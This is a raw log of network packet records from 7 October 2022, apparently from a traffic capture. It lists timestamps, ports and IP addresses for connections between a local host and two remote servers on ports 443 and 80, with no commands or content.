Oct 7, 2022 15:59:49.837920904 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.837929964 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.837954998 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.838141918 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.853236914 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.853293896 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.853362083 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.853374958 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.853410006 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.853897095 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.853960037 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.855559111 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.855609894 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.855619907 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.855628014 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.855676889 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.856978893 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.857017994 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.857042074 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.857053041 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.858124018 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.858200073 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.858210087 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.858248949 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.859180927 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.859234095 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.859261036 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.859267950 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.859302044 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.860090017 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.860150099 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.860168934 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.860177994 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.861107111 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.861135960 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.861144066 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.861206055 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.862020969 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.862082958 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.862118006 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.862124920 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.863017082 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.863068104 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.863095045 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.863106966 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.863116980 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.872103930 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.872343063 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.872381926 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.872463942 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.872495890 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.872509956 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.873264074 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.873471022 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.873478889 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.873531103 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.873750925 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.873759031 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.874401093 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.874444008 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.874480963 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.874489069 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.874531031 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.875117064 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.875180006 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.875233889 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.875241041 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.875278950 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.875807047 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.875869036 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.878839970 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.878906012 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.878937960 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.878947020 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.878961086 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.878989935 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.878995895 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879009008 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879040003 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879057884 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879065990 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879080057 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879084110 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879127979 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879133940 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879144907 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879184961 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879216909 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879230976 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879237890 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879257917 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879661083 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879697084 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879744053 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.879753113 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.879790068 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.881145000 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.881217957 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.881232023 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.881246090 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.881261110 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.881311893 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.881320953 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.881371021 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.882193089 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882236958 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882251024 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.882256985 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882286072 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882330894 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.882339954 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882383108 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.882905960 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882956982 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.882975101 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.882987976 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.885102034 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891047955 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891110897 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891120911 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891134977 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891155005 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891171932 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891179085 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891197920 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891215086 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891222000 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891237020 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891256094 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891263008 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891298056 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891869068 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891911983 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891921043 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891952038 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.891962051 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.891992092 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.892000914 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.892030954 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.892815113 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.892853022 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.892865896 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.892898083 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.892906904 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.892935991 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.893703938 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893748045 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.893755913 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893769026 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893809080 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.893812895 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893822908 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893855095 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.893862009 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893872023 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.893907070 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.894571066 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.894618034 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.894623041 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.894634962 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.894674063 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.894706011 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.894715071 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.894743919 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.895370960 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.895412922 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.895417929 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.895428896 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.895971060 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.896014929 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.896023035 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.896051884 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.896219969 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.896260977 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.896332026 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.896377087 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.896429062 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.896471977 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.898708105 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898760080 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898770094 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.898777008 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898816109 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.898818016 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898832083 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898865938 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.898891926 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898929119 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898933887 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.898941994 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898963928 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.898998976 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899029016 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.899034023 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899049044 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899056911 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.899091959 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899106026 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.899112940 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899128914 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899159908 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899180889 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.899188042 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899226904 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899265051 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.899274111 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.899283886 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.900387049 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900439024 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900461912 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.900470018 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900480032 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900507927 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.900515079 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900549889 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.900556087 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900650024 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.900690079 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:51.159584045 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:13.475414038 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.501756907 CEST	80	49717	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:13.502015114 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.930033922 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.931078911 CEST	49719	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.957535982 CEST	80	49715	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:13.957657099 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.960622072 CEST	80	49719	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:13.960793018 CEST	49719	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.961204052 CEST	49719	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:13.990458012 CEST	80	49719	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:13.993751049 CEST	80	49719	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:14.220957994 CEST	49719	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:14.240591049 CEST	80	49719	103.136.42.153	192.168.2.5
Oct 7, 2022 16:00:14.240712881 CEST	49719	80	192.168.2.5	103.136.42.153
Oct 7, 2022 16:00:15.172933102 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.172966003 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.173033953 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.173573017 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.173587084 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.223529100 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.223644018 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.227276087 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.227283001 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.227756977 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.228336096 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.228344917 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.801847935 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.801961899 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.802045107 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.802124977 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.802150011 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.802165031 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.802181959 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.802196026 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.803337097 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.803423882 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.803432941 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.803488970 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.805212021 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.805283070 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.805284023 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.805308104 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.805365086 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.820672989 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.820769072 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.820787907 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.820844889 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.821235895 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.821322918 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.822915077 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.823035955 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.823045015 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.823070049 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.823303938 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.824265957 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.824337959 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.824352026 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.824374914 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.824757099 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.825458050 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.825529099 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.826481104 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.826555967 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.826579094 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.826586962 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.826632023 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.827445030 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.827517033 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.827522039 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.827543020 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.828448057 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.828525066 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.828537941 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.828583956 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.829323053 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.829391956 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.829406023 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.829457045 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.830248117 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.830326080 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.830353022 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.830360889 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.830408096 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.839566946 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.839670897 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.839677095 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.839694977 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.839747906 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.840387106 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.840471983 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.840476036 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.840497017 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.840543032 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.841172934 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.841247082 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.841941118 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.842025042 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.842026949 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.842047930 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.842951059 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.843033075 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.843096972 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.843108892 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.843391895 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844129086 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844182014 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.844189882 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844206095 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844235897 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.844242096 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844281912 CEST	49720	443	192.168.2.5	185.60.216.35
Oct 7, 2022 16:00:15.844820976 CEST	443	49720	185.60.216.35	192.168.2.5
Oct 7, 2022 16:00:15.844897032 CEST	49720	443	192.168.2.5	185.60.216.35
